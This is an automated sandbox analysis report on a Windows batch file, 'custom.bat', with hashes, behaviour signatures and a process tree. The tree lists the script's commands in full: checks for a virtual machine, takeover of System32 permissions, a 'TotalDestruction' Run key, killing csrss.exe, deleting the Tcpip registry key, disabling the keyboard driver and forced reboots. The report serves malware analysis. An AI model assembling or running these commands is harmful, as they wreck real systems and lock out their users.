Analysis

  • max time kernel
    46s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08/09/2024, 06:41

Errors

Reason
Machine shutdown

General

  • Target

    custom.bat

  • Size

    2KB

  • MD5

    6482067516f0f24cdc0a596de66c951a

  • SHA1

    9a77d1d6bc48250c98e57af675dec3a2dac51ed8

  • SHA256

    1b8c1fc80ad13c703485ddb7f6581584e5b538862287266b960f4994549214a3

  • SHA512

    25fa1d45b9a10e97cded264824bae7e2d149850d2e0a618b448f434aedee160b7f014dca765aadd501d064e952effe5393d0163dd0cfe1bd8c03de593c037e86

Malware Config

Signatures

  • Possible privilege escalation attempt 3 IoCs
  • Stops running service(s) 4 TTPs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 3 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 3 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Windows\system32\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Start-Process cmd -Verb runAs"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          4⤵
            PID:2724
        • C:\Windows\system32\systeminfo.exe
          systeminfo
          3⤵
          • Gathers system information
          PID:2540
        • C:\Windows\system32\findstr.exe
          findstr /i "VirtualBox"
          3⤵
            PID:2560
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            3⤵
            • Gathers system information
            PID:1788
          • C:\Windows\system32\findstr.exe
            findstr /i "VMware"
            3⤵
              PID:2208
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              3⤵
              • Gathers system information
              PID:996
            • C:\Windows\system32\findstr.exe
              findstr /i "Hyper-V"
              3⤵
                PID:2604
              • C:\Windows\system32\tasklist.exe
                tasklist
                3⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:2040
              • C:\Windows\system32\findstr.exe
                findstr /i "vmsrvc.exe"
                3⤵
                  PID:1692
                • C:\Windows\system32\tasklist.exe
                  tasklist
                  3⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1196
                • C:\Windows\system32\findstr.exe
                  findstr /i "VBoxService.exe"
                  3⤵
                    PID:2268
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\System32\* /r /d y
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2444
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\* /grant Admin:F /t /c
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:680
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\drivers\* /grant Admin:F /t /c
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:264
                  • C:\Windows\system32\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
                    3⤵
                    • Adds Run key to start application
                    PID:588
                  • C:\Windows\system32\reg.exe
                    reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f
                    3⤵
                    • Adds Run key to start application
                    • Modifies registry key
                    PID:1600
                  • C:\Windows\system32\taskkill.exe
                    taskkill /IM vmsrvc.exe /F
                    3⤵
                    • Kills process with taskkill
                    PID:1684
                  • C:\Windows\system32\taskkill.exe
                    taskkill /IM VBoxService.exe /F
                    3⤵
                    • Kills process with taskkill
                    PID:2368
                  • C:\Windows\system32\ipconfig.exe
                    ipconfig /release
                    3⤵
                    • Gathers network information
                    PID:2252
                  • C:\Windows\system32\netsh.exe
                    netsh interface ip delete arpcache
                    3⤵
                      PID:2404
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\Tcpip /f
                      3⤵
                      • Modifies registry key
                      PID:2364
                    • C:\Windows\system32\sc.exe
                      sc stop i8042prt
                      3⤵
                      • Launches sc.exe
                      PID:2116
                    • C:\Windows\system32\taskkill.exe
                      taskkill /IM csrss.exe /F
                      3⤵
                      • Kills process with taskkill
                      PID:1932
                    • C:\Windows\system32\shutdown.exe
                      shutdown /r /f /t 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2240
                    • C:\Windows\system32\shutdown.exe
                      shutdown /r /f /t 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1888
                    • C:\Windows\system32\shutdown.exe
                      shutdown /r /f /t 0
                      3⤵
                        PID:2172
                      • C:\Windows\system32\shutdown.exe
                        shutdown /r /f /t 0
                        3⤵
                          PID:3044
                    • C:\Windows\system32\LogonUI.exe
                      "LogonUI.exe" /flags:0x0
                      1⤵
                        PID:2392
                      • C:\Windows\system32\LogonUI.exe
                        "LogonUI.exe" /flags:0x1
                        1⤵
                          PID:2092

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/2812-4-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

                          Filesize

                          4KB

                        • memory/2812-6-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

                          Filesize

                          9.6MB

                        • memory/2812-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

                          Filesize

                          2.9MB

                        • memory/2812-8-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

                          Filesize

                          9.6MB

                        • memory/2812-9-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

                          Filesize

                          9.6MB

                        • memory/2812-7-0x0000000002290000-0x0000000002298000-memory.dmp

                          Filesize

                          32KB

                        • memory/2812-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

                          Filesize

                          9.6MB

                        • memory/2812-11-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

                          Filesize

                          9.6MB

                        • memory/2812-12-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

                          Filesize

                          9.6MB